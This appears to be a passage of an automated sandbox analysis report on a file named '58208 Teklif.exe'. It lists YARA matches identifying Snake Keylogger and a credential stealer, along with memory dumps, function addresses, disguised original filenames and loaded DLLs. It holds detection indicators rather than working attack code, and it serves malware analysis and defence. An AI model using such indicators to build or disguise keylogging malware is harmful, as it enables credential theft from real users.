            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
            Source: Process Memory Space: 58208 Teklif.exe PID: 7580, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_0155DE0C0_2_0155DE0C
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_077900400_2_07790040
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_07799E580_2_07799E58
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_077955900_2_07795590
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_077955880_2_07795588
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_07792C480_2_07792C48
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_07792C380_2_07792C38
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_077934B80_2_077934B8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_07794CB80_2_07794CB8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_077934A80_2_077934A8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_077900070_2_07790007
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 0_2_077930800_2_07793080
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141617D3_2_0141617D
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141C1F03_2_0141C1F0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141B3883_2_0141B388
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141C4D03_2_0141C4D0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141C7B23_2_0141C7B2
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_014168E03_2_014168E0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_01414B313_2_01414B31
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141CA923_2_0141CA92
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141BC323_2_0141BC32
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141BF103_2_0141BF10
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_014191D03_2_014191D0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141305E3_2_0141305E
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141223D3_2_0141223D
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141B5523_2_0141B552
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141F5023_2_0141F502
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_014135CA3_2_014135CA
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141EA083_2_0141EA08
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_0141EA0D3_2_0141EA0D
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A989B03_2_05A989B0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A944903_2_05A94490
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A990DD3_2_05A990DD
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9C9B83_2_05A9C9B8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A919803_2_05A91980
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9F9803_2_05A9F980
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A91DE03_2_05A91DE0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A91DD03_2_05A91DD0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9F5283_2_05A9F528
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A915203_2_05A91520
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9C1083_2_05A9C108
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9C5603_2_05A9C560
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A944803_2_05A94480
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A910C03_2_05A910C0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9F0D03_2_05A9F0D0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9E8203_2_05A9E820
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A980083_2_05A98008
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9800D3_2_05A9800D
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A90C603_2_05A90C60
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9EC783_2_05A9EC78
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A900403_2_05A90040
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A900453_2_05A90045
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A90C503_2_05A90C50
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A987903_2_05A98790
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9E3C83_2_05A9E3C8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9DB183_2_05A9DB18
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9DF703_2_05A9DF70
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9D6C03_2_05A9D6C0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9CE103_2_05A9CE10
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_05A9D2683_2_05A9D268
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDAEA83_2_06BDAEA8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDDAC03_2_06BDDAC0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDCE283_2_06BDCE28
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD8A583_2_06BD8A58
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDC7D83_2_06BDC7D8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDBB383_2_06BDBB38
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD908D3_2_06BD908D
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDB4F03_2_06BDB4F0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDD4783_2_06BDD478
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDA8583_2_06BDA858
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDC1883_2_06BDC188
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD15F83_2_06BD15F8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDAE983_2_06BDAE98
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD5EC03_2_06BD5EC0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDCE183_2_06BDCE18
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD86003_2_06BD8600
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD5A683_2_06BD5A68
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD8A5D3_2_06BD8A5D
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD5A583_2_06BD5A58
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD3B803_2_06BD3B80
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD6BC83_2_06BD6BC8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDC7CA3_2_06BDC7CA
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDBB273_2_06BDBB27
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD63183_2_06BD6318
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD67703_2_06BD6770
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD74A03_2_06BD74A0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD04983_2_06BD0498
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD48803_2_06BD4880
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD78F83_2_06BD78F8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD08F03_2_06BD08F0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD78EF3_2_06BD78EF
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD08E73_2_06BD08E7
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD00373_2_06BD0037
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD70203_2_06BD7020
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD38083_2_06BD3808
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD38033_2_06BD3803
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDD4683_2_06BDD468
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD00403_2_06BD0040
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD81A83_2_06BD81A8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD11A03_2_06BD11A0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD55E83_2_06BD55E8
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD55D93_2_06BD55D9
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD2D053_2_06BD2D05
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BDC1783_2_06BDC178
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD7D503_2_06BD7D50
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BD0D483_2_06BD0D48
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BF35703_2_06BF3570
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFDEA03_2_06BFDEA0
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFDE9B3_2_06BFDE9B
            Source: C:\Users\user\Desktop\58208 Teklif.exeCode function: 3_2_06BFBFEC3_2_06BFBFEC
            Source: 58208 Teklif.exeStatic PE information: invalid certificate
            Source: 58208 Teklif.exe, 00000000.00000002.1319232533.000000000320C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000000.1304898513.0000000000DCA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuVJY.exe, vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000002.1322453048.0000000007D40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000000.00000002.1317484204.00000000012DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000003.00000002.3765108626.0000000000DA7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs 58208 Teklif.exe
            Source: 58208 Teklif.exe, 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs 58208 Teklif.exe
            Source: 58208 Teklif.exeBinary or memory string: OriginalFilenameuVJY.exe, vs 58208 Teklif.exe
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\58208 Teklif.exeSection loaded: dpapi.dllJump to behavior
            Source: 58208 Teklif.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.58208 Teklif.exe.445b6e0.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 3.2.58208 Teklif.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.58208 Teklif.exe.447bf00.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.58208 Teklif.exe.447bf00.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.58208 Teklif.exe.445b6e0.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000003.00000002.3764622818.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.1320427811.000000000438E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: 58208 Teklif.exe PID: 7436, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
